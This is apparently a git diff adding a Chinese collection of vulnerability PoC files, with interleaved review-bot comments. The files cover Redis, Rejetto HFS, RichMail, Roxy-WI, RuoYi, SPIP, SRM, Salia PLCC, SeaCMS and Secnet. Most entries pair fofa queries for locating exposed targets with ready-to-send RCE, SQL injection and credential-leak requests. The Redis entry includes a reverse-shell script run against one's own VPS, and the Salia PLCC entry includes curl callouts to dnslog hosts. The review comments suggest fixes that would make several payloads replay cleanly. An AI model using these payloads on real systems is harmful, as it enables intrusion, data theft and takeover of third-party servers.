0000000..cc0a70d --- /dev/null +++ b/Redis-manager存在SpringBoot未授权漏洞.md @@ -0,0 +1,25 @@ +# Redis-manager存在SpringBoot未授权漏洞 + +# 一、漏洞简介 +Redis-manager存在SpringBoot未授权漏洞 + +# 二、影响版本 ++ Redis-manager + +# 三、资产测绘 ++ fofa`title="redis-manager"` ++ 特征 + +![1722503666116-484bd9a1-c45d-446f-8822-043858923c84.png](./img/ozgJoW32TNP3H6_C/1722503666116-484bd9a1-c45d-446f-8822-043858923c84-582883.png) + +# 四、漏洞复现 +```java +/actuator +``` + +![1722503902922-adc0c038-0bb7-4254-816f-07fdcb89dbca.png](./img/ozgJoW32TNP3H6_C/1722503902922-adc0c038-0bb7-4254-816f-07fdcb89dbca-559830.png) + + + +> 更新: 2024-08-12 17:15:58 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bd4ewn4tipkp4asb> \ No newline at end of file diff --git a/Redis-manager存在默认口令漏洞.md b/Redis-manager存在默认口令漏洞.md new file mode 100644 index 0000000..310df57 --- /dev/null +++ b/Redis-manager存在默认口令漏洞.md 
@@ -0,0 +1,25 @@ +# Redis-manager存在默认口令漏洞 + +# 一、漏洞简介 +Redis-manager存在默认口令漏洞 + +# 二、影响版本 ++ Redis-manager + +# 三、资产测绘 ++ fofa`title="redis-manager"` ++ 特征 + +![1722503666116-484bd9a1-c45d-446f-8822-043858923c84.png](./img/ZwxZi7OgyYvsLYp8/1722503666116-484bd9a1-c45d-446f-8822-043858923c84-127056.png) + +# 四、漏洞复现 +```java +admin/admin +``` + +![1722503654485-c31e50f4-edf3-46b0-930a-1c9e57758b8f.png](./img/ZwxZi7OgyYvsLYp8/1722503654485-c31e50f4-edf3-46b0-930a-1c9e57758b8f-229985.png) + + + +> 更新: 2024-08-12 17:15:58 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kbs59gun554dkc0k> \ No newline at end of file diff --git a/Redis存在未授权访问导致的RCE.md b/Redis存在未授权访问导致的RCE.md new file mode 100644 index 0000000..02c3216 --- /dev/null +++ b/Redis存在未授权访问导致的RCE.md @@ -0,0 +1,36 @@ +# Redis存在未授权访问导致的RCE + +# 一、漏洞描述 +redis是一个非常快速的,开源的,支持网络,可以基于内存,也可以持久化的日志型,非关系型的键值对数据库。并提供了多种语言的api。有java,c/c++,c#,php,JavaScript,perl,object-c,python,ruby,erlang等客户端,使用方便。Redis存在未授权访问导致的RCE + +# 二、影响版本 +Redis + +# 三、资产测绘 +```plain +app="redis" +``` + +![1730008100396-b60c7ec9-97aa-491a-9229-cc41975bfbaa.png](./img/1fBdiLYyi01ByAzn/1730008100396-b60c7ec9-97aa-491a-9229-cc41975bfbaa-952279.png) + +# 三、漏洞复现 +![1730008135522-2752b193-04f5-44d4-87cc-e50cbe4683ac.png](./img/1fBdiLYyi01ByAzn/1730008135522-2752b193-04f5-44d4-87cc-e50cbe4683ac-462694.png) + +反弹shell使用脚本 + +[RedisGetshell.py](https://www.yuque.com/attachments/yuque/0/2024/txt/29512878/1732673083520-cd32abee-9703-4958-aa1c-02c3d6e94e7b.txt) + +```plain +python RedisGetshell.py -H 127.0.0.1 -P 6379 +``` + +选3,之后输入自己vps地址,即可反弹shell + +![1730008351143-c3229d9a-105e-4908-be63-0acbd96e26d4.png](./img/1fBdiLYyi01ByAzn/1730008351143-c3229d9a-105e-4908-be63-0acbd96e26d4-139525.png) + +![1730008405363-cfa5d390-7a75-4ebd-b35d-8b44b0307856.png](./img/1fBdiLYyi01ByAzn/1730008405363-cfa5d390-7a75-4ebd-b35d-8b44b0307856-287531.png) + + + +> 更新: 2024-11-27 10:04:43 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hrg8q2mccg664x20> \ No newline at end of file 
diff --git a/RejettoHTTP文件服务器search存在命令执行漏洞(CVE-2024-23692).md b/RejettoHTTP文件服务器search存在命令执行漏洞(CVE-2024-23692).md new file mode 100644 index 0000000..86393dd --- /dev/null +++ b/RejettoHTTP文件服务器search存在命令执行漏洞(CVE-2024-23692).md @@ -0,0 +1,34 @@ +# Rejetto HTTP文件服务器search存在命令执行漏洞(CVE-2024-23692) + +# 一、漏洞简介 +Rejetto HTTP文件服务器是一款免费的、跨平台的、基于Java的轻量级HTTP文件服务器软件。它允许用户通过Web浏览器访问和管理文件,支持上传、下载、删除、重命名、创建目录等操作。 Rejetto HTTP文件服务器 search接口处存在RCE漏洞(CVE-2024-23692),恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。 + +# 二、影响版本 ++ Rejetto HTTP File Server <= 2.3m + +# 三、资产测绘 +```http +app="HFS" +``` + ++ 特征 + +![1718116518836-b92544c4-a811-4dee-8285-756a066df0ce.png](./img/-gVG0vk06azCeMDZ/1718116518836-b92544c4-a811-4dee-8285-756a066df0ce-300730.png) + +# 四、漏洞复现 +```java +GET /?n=%0A&cmd=netstat&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1 +Host:127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: close +``` + +![1718116766397-856eb67d-c89a-4559-a5b4-662267245327.png](./img/-gVG0vk06azCeMDZ/1718116766397-856eb67d-c89a-4559-a5b4-662267245327-686273.png) + + + +> 更新: 2024-06-17 09:34:03 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ksyz94lfputxy1uv> \ No newline at end of file diff --git a/RichMail企业邮箱敏感信息泄漏漏洞.md b/RichMail企业邮箱敏感信息泄漏漏洞.md new file mode 100644 index 0000000..b5f5991 --- /dev/null +++ b/RichMail企业邮箱敏感信息泄漏漏洞.md 
@@ -0,0 +1,47 @@ +# RichMail 企业邮箱敏感信息泄漏漏洞 + +# 一、漏洞简介 +<font style="color:rgb(0, 0, 0);"> Richmail是亚太本土最大的电子邮件系统提供商之一,是新一代智慧企业云邮件系统,以安全、稳定、高效著称。Richmail作为投资千万,自主研发的邮件系统,获得了多项发明专利,凭借移动化、套件化、能力开放及服务计量等等核心技术,持续引领全球邮箱领域的发展方向,每天数以亿计的智慧和信息在Richmail汇聚、碰撞、传递。RichMail某版本存在信息泄漏漏洞,未经授权的攻击者可以利用此漏洞获取企业邮箱的账号密码信息,登陆管理后台。</font> + +# <font style="color:rgb(0, 0, 0);">二、影响版本</font> ++ RichMail 企业邮箱 + +# 三、资产测绘 ++ fofa`app="Richmail-企业邮箱"` ++ 特征 + +![1698649024138-ac0b79ce-40c0-4dcd-a7e8-6e25b26e5202.png](./img/JPHu9Cvqk-3yYyGV/1698649024138-ac0b79ce-40c0-4dcd-a7e8-6e25b26e5202-025912.png) + +# 四、漏洞复现 +按需调整`X-Forwarded-For: 127.0.0.1` + +```plain +GET /RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin HTTP/1.1 +Host: xx.xx.xx.xx +Cookie: lang=zh_CN +X-Forwarded-For: 127.0.0.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1698649060171-6bcea3b8-efd4-4a42-bd6b-bb9f6f17cff0.png](./img/JPHu9Cvqk-3yYyGV/1698649060171-6bcea3b8-efd4-4a42-bd6b-bb9f6f17cff0-811517.png) + +获取管理员MD5加密值后抓去登陆数据包替换即可进入后台 + +![1698649267168-8c5ddd8b-5070-4841-9109-627032ea6d62.png](./img/JPHu9Cvqk-3yYyGV/1698649267168-8c5ddd8b-5070-4841-9109-627032ea6d62-103965.png) + +![1698649300470-de7ba283-6de1-4d76-91f7-f3254744b023.png](./img/JPHu9Cvqk-3yYyGV/1698649300470-de7ba283-6de1-4d76-91f7-f3254744b023-812193.png) + + + +> 更新: 2024-02-29 23:57:46 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nngn0owe1cvrrahv> \ No newline at end of file diff --git a/Roxy-WIoptions.py远程命令执行漏洞.md b/Roxy-WIoptions.py远程命令执行漏洞.md new file mode 100644 index 0000000..4d444a8 --- /dev/null 
+++ b/Roxy-WIoptions.py远程命令执行漏洞.md @@ -0,0 +1,41 @@ +# Roxy-WI options.py远程命令执行漏洞 + +# 一、漏洞简介 +`Roxy-WI`是开源的一款用于管理`Haproxy`、`Nginx`和`Keepalive`服务器的`Web`界面。`Roxy-WI 6.1.1.0`之前版本`options.py`接口存在远程命令执行漏洞,攻击者可以执行命令获取服务器权限。 + +# 二、影响版本 ++ Roxy-WI 6.1.1.0之前 + +# 三、资产测绘 ++ hunter`app.name="Roxy-WI"` ++ 登录页面 + +![1693667442839-660cc767-28ad-4aad-bd3b-4d9c2e14d7be.png](./img/iCSSjRE_IUgiPq-B/1693667442839-660cc767-28ad-4aad-bd3b-4d9c2e14d7be-859787.png) + +# 四、漏洞复现 +```java +POST /app/options.py HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 82 + +alert_consumer=1&serv=127.0.0.1&ipbackend=%22%3Bid+%23%23&backend_server=127.0.0.1 +``` + +![1693667552294-597d9ca3-20e3-4250-b873-5f3200e3583d.png](./img/iCSSjRE_IUgiPq-B/1693667552294-597d9ca3-20e3-4250-b873-5f3200e3583d-511689.png) + + + +> 更新: 2024-02-29 23:57:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rhpr1hfx80b04z1f> \ No newline at end of file diff --git a/RuoYi4.6.0-SQL注入漏洞CVE-2023-49371.md b/RuoYi4.6.0-SQL注入漏洞CVE-2023-49371.md new file mode 100644 index 0000000..08e61de --- /dev/null +++ b/RuoYi4.6.0-SQL注入漏洞CVE-2023-49371.md 
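Review bot: the request block in Roxy-WIoptions.py远程命令执行漏洞.md is fenced ```java but contains an HTTP request; tag it ```http. The text never names the injection point, although the body `alert_consumer=1&serv=127.0.0.1&ipbackend=%22%3Bid+%23%23&backend_server=127.0.0.1` makes it `ipbackend`; one sentence saying so gives a maintainer the parameter to validate. The version boundary `6.1.1.0之前` is given with no advisory or fix reference; add one so the fixed release can be verified.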
@@ -0,0 +1,11 @@ +## RuoYi4.6.0 SQL注入漏洞CVE-2023-49371 + +若依在4.6版本之前存在SQL注入漏洞,攻击者通过该漏洞可以进行SQL注入利用,从而获取数据库中的敏感信息 + +## poc +``` +DeptName=1&deptid =100&ParentId=12&Status= 0&ordernum =1&ancestors=0)or(extractvalue(1,concat((select user())))); # +``` +![image](https://github.com/wy876/POC/assets/139549762/7c110048-af68-42e5-ba3b-ffb69bb28f17) + +![image](https://github.com/wy876/POC/assets/139549762/653098c3-5c6d-45a9-b50a-850b48475662) diff --git a/SPIP-porte_plume插件存在任意PHP执行漏洞(CVE-2024-7954).md b/SPIP-porte_plume插件存在任意PHP执行漏洞(CVE-2024-7954).md new file mode 100644 index 0000000..c2ce9c3 --- /dev/null +++ b/SPIP-porte_plume插件存在任意PHP执行漏洞(CVE-2024-7954).md @@ -0,0 +1,22 @@ +# SPIP-porte_plume插件存在任意PHP执行漏洞(CVE-2024-7954) + +SPIP使用的porte_plume插件存在任意代码执行漏洞。未经身份验证的远程攻击者可以通过发送精心设计的 HTTP 请求以 SPIP 用户身份执行任意 PHP。 + +## fofa + +```java +icon_hash=="-1224668706" +``` + +## poc + +```java +POST /index.php?action=porte_plume_previsu HTTP/1.1 +Host: 127.0.0.1 +Connection: close +Content-Type: application/x-www-form-urlencoded +User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 + +data=AA_%5B%3Cimg111111%3E-%3EURL%60%3C%3Fphp+system%28%22whoami%22%29%3B%3F%3E%60%5D_BB +``` + diff --git a/SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954).md b/SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954).md new file mode 100644 index 0000000..403dd31 --- /dev/null +++ b/SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954).md 
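Review bot: the `poc` block in RuoYi4.6.0-SQL注入漏洞CVE-2023-49371.md is only a request body with no method, path or host, so it cannot be replayed as written; add the request line. The parameter names contain stray spaces (`deptid =100`, `Status= 0`, `ordernum =1`) that would send `deptid ` rather than `deptid`. The prose says `4.6版本之前` while the title says `4.6.0`; state clearly whether 4.6.0 itself is affected and which release fixes it.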
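Review bot: SPIP-porte_plume插件存在任意PHP执行漏洞(CVE-2024-7954).md duplicates SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954).md, added in the same commit with the same CVE, the same fofa query `icon_hash=="-1224668706"` and the same endpoint `/index.php?action=porte_plume_previsu`; keep one file. In whichever is kept, the fofa query is fenced ```java (it is not Java) and `User-Agent:Mozilla/5.0` lacks the space after the colon.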
@@ -0,0 +1,31 @@ +# SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954) + +# 一、漏洞简介 +SPIP 4.30-alpha2、4.2.13、4.1.16之前的版本使用的porte_plume插件存在任意代码执行漏洞,远程未经身份验证的攻击者可以通过发送精心设计的HTTP 请求以SPIP用户身份执行任意PHP代码。 + +# 二、影响版本 +SPIP插件porte_plume + +# 三、资产测绘 ++ fofa`icon_hash=="-1224668706"` ++ 特征 + +![1725074957647-c35def1f-98a2-4638-8491-08b2d4d9feef.png](./img/MgI_aUY7wIBqRyz7/1725074957647-c35def1f-98a2-4638-8491-08b2d4d9feef-386188.png) + +# 四、漏洞复现 +```java +POST /index.php?action=porte_plume_previsu HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Content-Length: 0 + +data=AA_[<img111111>->URL`<?php system("id");?>`]_BB +``` + +![1724987402306-140c705e-9e86-409c-a1d9-55ba7910f820.png](./img/MgI_aUY7wIBqRyz7/1724987402306-140c705e-9e86-409c-a1d9-55ba7910f820-580953.png) + + + +> 更新: 2024-09-05 23:21:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gzh7mvbhub0l35ct> \ No newline at end of file diff --git a/SRM智联云采系统getSuppliers存在SQL注入漏洞.md b/SRM智联云采系统getSuppliers存在SQL注入漏洞.md new file mode 100644 index 0000000..3e3db87 --- /dev/null +++ b/SRM智联云采系统getSuppliers存在SQL注入漏洞.md 
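Review bot: the request in 四、漏洞复现 sets `Content-Length: 0` but carries a body (`data=AA_[<img111111>->URL...]_BB`), so a client that honors the header sends no body at all; set the real length or drop the header. `Host:` is empty. 二、影响版本 lists only `SPIP插件porte_plume` although 简介 already names the fixed releases (4.30-alpha2, 4.2.13, 4.1.16); put those into 影响版本 as the affected ranges so the fix is visible at a glance.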
@@ -0,0 +1,20 @@ +# SRM智联云采系统getSuppliers存在SQL注入漏洞 +智互联(深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。智互联(深圳)科技有限公司SRM智联云采系统getSuppliers存在SQL注入漏洞。 + +## fofa +```javascript +title=="SRM 2.0" +``` + +## poc +```java +POST /adpweb/static/%2e%2e;/a/srm/inquiry/getSuppliers?code=%27+AND+%28SELECT+1312+FROM+%28SELECT%28SLEEP%283%29%29%29HckV%29--+HyuV HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +``` + +![image-20241122151303974](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221513048.png) diff --git a/SRM智联云采系统inquiry存在SQL注入漏洞.md b/SRM智联云采系统inquiry存在SQL注入漏洞.md new file mode 100644 index 0000000..6872a5e --- /dev/null +++ b/SRM智联云采系统inquiry存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +# SRM智联云采系统inquiry存在SQL注入漏洞 +智互联(深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。智互联(深圳)科技有限公司SRM智联云采系统inquiry存在SQL注入漏洞。 + +## fofa +``` +title=="SRM 2.0" +``` + +## poc +```java +GET /adpweb/static/%2e%2e;/a/srm/inquiry/getSuppliers?code=1%27+AND+GTID_SUBSET%28CONCAT%280x7e%2C%28SELECT+md5%281234%29%29%2C0x7e%29%2C7973%29--+WkOF&name=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.9 +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip +``` + +![image-20241120093233440](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411200932557.png) + diff --git a/SRM智联云采系统quickReceiptDetail存在SQL注入漏洞.md b/SRM智联云采系统quickReceiptDetail存在SQL注入漏洞.md new file mode 100644 index 0000000..0641262 --- /dev/null 
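Review bot: the PoC in SRM智联云采系统getSuppliers存在SQL注入漏洞.md is a `POST` with neither `Content-Length` nor body, and `Host:` is empty; the injection is entirely in the `code` query parameter, so either use `GET` or supply the body the endpoint expects. The fofa query is fenced ```javascript; use a plain fence. There is no 二、影响版本 section, unlike the other entries; add one even if the value is 未知, and name the fixed version if known.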
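Review bot: SRM智联云采系统inquiry存在SQL注入漏洞.md targets the same endpoint `/a/srm/inquiry/getSuppliers?code=` as SRM智联云采系统getSuppliers存在SQL注入漏洞.md in this commit, differing only in the payload (error-based `GTID_SUBSET` instead of time-based `SLEEP`); fold it into the getSuppliers entry as a second payload rather than listing a second vulnerability. The title `inquiry存在SQL注入` names a path segment, not the vulnerable endpoint or the `code` parameter. `Host:` is empty and 影响版本 is missing here too.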
+++ b/SRM智联云采系统quickReceiptDetail存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +# SRM智联云采系统quickReceiptDetail存在SQL注入漏洞 +智互联(深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。智互联(深圳)科技有限公司SRM智联云采系统quickReceiptDetail存在SQL注入漏洞。 + +## fofa +```javascript +title=="SRM 2.0" +``` + +## poc +```java +POST /adpweb/api/srm/delivery/quickReceiptDetail?orderBy=%28UPDATEXML%288058%2CCONCAT%280x2e%2C0x71707a7671%2C%28SELECT+%28ELT%288058%3D8058%2C1%29%29%29%2C0x71766a7671%29%2C3521%29%29 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +``` + +![image-20241122151037735](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221510814.png) + diff --git a/SRM智联云采系统receiptDetail存在SQL注入漏洞.md b/SRM智联云采系统receiptDetail存在SQL注入漏洞.md new file mode 100644 index 0000000..aea4f6f --- /dev/null +++ b/SRM智联云采系统receiptDetail存在SQL注入漏洞.md 
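Review bot: the request in SRM智联云采系统quickReceiptDetail存在SQL注入漏洞.md is a `POST` with no body or `Content-Length`, and `Host:` is empty; the payload sits in the `orderBy` query parameter, so use `GET` or supply the expected body. The text never names `orderBy` as the injectable parameter; say so. No 二、影响版本 section, and the fofa query is fenced ```javascript.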
@@ -0,0 +1,20 @@ +# SRM智联云采系统receiptDetail存在SQL注入漏洞 +智互联(深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。智互联(深圳)科技有限公司SRM智联云采系统receiptDetail存在SQL注入漏洞。 + +## fofa +```javascript +title=="SRM 2.0" +``` + +## poc +```java +POST /adpweb/api/srm/delivery/receiptDetail?orderBy=%28UPDATEXML%288058%2CCONCAT%280x2e%2C0x71707a7671%2C%28SELECT+%28ELT%288058%3D8058%2C1%29%29%29%2C0x71766a7671%29%2C3521%29%29 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +``` + +![image-20241122151334246](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221513324.png) diff --git a/SRM智联云采系统statusList存在SQL注入漏洞.md b/SRM智联云采系统statusList存在SQL注入漏洞.md new file mode 100644 index 0000000..a5247cc --- /dev/null +++ b/SRM智联云采系统statusList存在SQL注入漏洞.md 
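Review bot: this request is identical to the quickReceiptDetail entry apart from the path `/api/srm/delivery/receiptDetail`, down to the same `orderBy=%28UPDATEXML%288058...` payload; state in the text that the two endpoints share the vulnerable `orderBy` parameter so a maintainer fixes both in one place, and fix the same defects here (`POST` with no body, empty `Host:`, missing 二、影响版本).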
@@ -0,0 +1,21 @@ +# SRM智联云采系统statusList存在SQL注入漏洞 +智互联(深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。智互联(深圳)科技有限公司SRM智联云采系统statusList存在SQL注入漏洞。 + +## fofa +```javascript +title=="SRM 2.0" +``` + +## poc +```java +POST /adpweb/static/..;/a/sys/sysMessage/statusList?companyName=1&officeName=1&orderBy=1&receiverName=1&sourceMessageId=1&delStatus=1%20AND%20(SELECT%207104%20FROM%20(SELECT(SLEEP(3)))xZoa) HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +``` + +![image-20241122151355129](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221513193.png) + diff --git a/Salia-PLCC-cPH2-远程命令执行漏洞(CVE-2023-46359).md b/Salia-PLCC-cPH2-远程命令执行漏洞(CVE-2023-46359).md new file mode 100644 index 0000000..ccf634c --- /dev/null +++ b/Salia-PLCC-cPH2-远程命令执行漏洞(CVE-2023-46359).md 
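Review bot: the path here uses `/adpweb/static/..;/` while the getSuppliers entries use `/adpweb/static/%2e%2e;/`; pick one encoding or state that both are equivalent, because that segment is the common element across all the SRM entries in this commit and is the most useful string for a WAF rule or access-log search. The `delStatus` parameter carries the time-based payload (`delStatus=1%20AND%20(SELECT%207104%20FROM%20(SELECT(SLEEP(3)))xZoa)`) but the text never names it. No 二、影响版本 section.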
@@ -0,0 +1,68 @@ +# Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359) + +## fofa +``` +"Salia PLCC" +``` + +![](./assets/20231226203214.png) + +## poc +``` +/connectioncheck.php?ip=127.0.0.1%20&&%20curl%20http://dnslog.cn + +/connectioncheck.php?ip=127.0.0.1%20&&%20${curl%209qa1r0.dnslog.cn} +``` + +![](./assets/20231226203501.png) + +![](./assets/20231226203521.png) + + +## yaml poc +``` +id: CVE-2023-46359 + +info: + name: cPH2 Charging Station v1.87.0 - OS Command Injection + author: mlec + severity: critical + description: | + An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature. + remediation: Fixed in version 2.0.0 + reference: + - https://www.offensity.com/en/blog/os-command-injection-in-cph2-charging-station-200-cve-2023-46359-and-cve-2023-46360/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-46359 + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:N/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.6 + cve-id: CVE-2023-46359 + metadata: + verified: true + max-request: 1 + shodan-query: html:"Salia PLCC" + tags: cve,cve2023,salia-plcc,cph2,rce + +http: + - method: GET + path: + - "{{BaseURL}}/connectioncheck.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}" + + matchers-condition: and + matchers: + - type: word + words: + - "<b>SUCCESS</b>" + - "127.0.0.1 && curl http://$(whoami).{{interactsh-url}}" + condition: and + + - type: status + status: + - 200 + + - type: word + part: interactsh_protocol + words: + - "dns" +# digest: 4a0a00473045022068ef983fa81262636ea41ef1e73a41004e64f96e9a0bf31555de76a92984a911022100851ff91914ba0856c3e59c01d679b4f5076ed7f404cb50efe363eb43f19ec7b3:922c64590222798bb761d5b6d8e72950 +``` diff --git a/SeaCMS海洋影视管理系统index.php存在SQL注入漏洞.md b/SeaCMS海洋影视管理系统index.php存在SQL注入漏洞.md new file mode 100644 index 0000000..bf5125b 
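Review bot: the hand-written `poc` block in Salia-PLCC-cPH2-远程命令执行漏洞(CVE-2023-46359).md uses a one-off callback host (`9qa1r0.dnslog.cn`) that belonged to someone's session and is not reusable; replace it with a placeholder such as `{{interactsh-url}}`, as the yaml template does. The yaml template already states `remediation: Fixed in version 2.0.0` and the affected range `v1.87.0 and earlier`; surface both in the markdown, which has no 简介 or 影响版本 section. The trailing `# digest:` line is the template's signature and only stays valid if the template is byte-identical to upstream; drop it if the template was edited.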
--- /dev/null +++ b/SeaCMS海洋影视管理系统index.php存在SQL注入漏洞.md @@ -0,0 +1,26 @@ +# SeaCMS海洋影视管理系统index.php存在SQL注入漏洞 + +SeaCMS海洋影视管理系统index.php存在SQL注入漏洞,攻击者可获取数据库敏感数据。 + +## fofa + +```yaml +app="海洋CMS" +``` + +## poc + +```java +POST /js/player/dmplayer/dmku/index.php?ac=edit HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Ldwk: bG91ZG9uZ3dlbmt1 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 56 + +cid=(select(1)from(select(sleep(6)))x)&text=1&color=1 +``` + diff --git a/Secnet安网-智能AC管理系统-actpt_5g-信息泄露.md b/Secnet安网-智能AC管理系统-actpt_5g-信息泄露.md new file mode 100644 index 0000000..7d1b980 --- /dev/null +++ b/Secnet安网-智能AC管理系统-actpt_5g-信息泄露.md @@ -0,0 +1,15 @@ +## Secnet安网 智能AC管理系统 actpt_5g 信息泄露 + +## fofa +``` +title="安网-智能路由系统" || header="HTTPD_ac 1.0" +``` +## poc +``` +http://xxxxx/actpt_5g.data +``` + +![069c247466403f3336550f21bcea0ff4](https://github.com/wy876/POC/assets/139549762/205a328b-f4cf-41a6-8cc0-c8d74db79876) + +![e06692e5a2926d80686685b5e8fec3c4](https://github.com/wy876/POC/assets/139549762/9caa2d80-b573-4638-b500-9bd87f642c51) + diff --git a/Secnet安网智能AC管理系统actpt_5g信息泄露.md b/Secnet安网智能AC管理系统actpt_5g信息泄露.md new file mode 100644 index 0000000..3cc00ff --- /dev/null +++ b/Secnet安网智能AC管理系统actpt_5g信息泄露.md 
